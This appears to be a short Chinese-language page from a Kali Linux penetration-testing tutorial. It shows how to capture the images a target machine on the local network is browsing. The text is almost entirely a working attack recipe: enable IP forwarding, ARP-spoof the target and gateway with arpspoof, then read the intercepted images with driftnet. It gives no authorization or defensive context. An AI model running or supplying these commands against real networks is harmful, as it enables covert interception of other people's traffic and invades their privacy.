View on GitHub

kali-tutorial

kali渗透测试教程,Kali渗透测试指南,Kali渗透测试详解

arpspoof+driftnet截取目标主机浏览的图片


攻击者网卡:eth0
攻击者ip: 192.168.1.2
目标ip: 192.168.1.3
网关ip: 192.168.1.1

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1

开启另一个终端

driftnet -i eth0

注:

driftnet命令为查看本机网卡的图片。

将目标ip的流量转发到本机然后查看本机网卡的图片即可实现获取目标主机正在浏览的图片。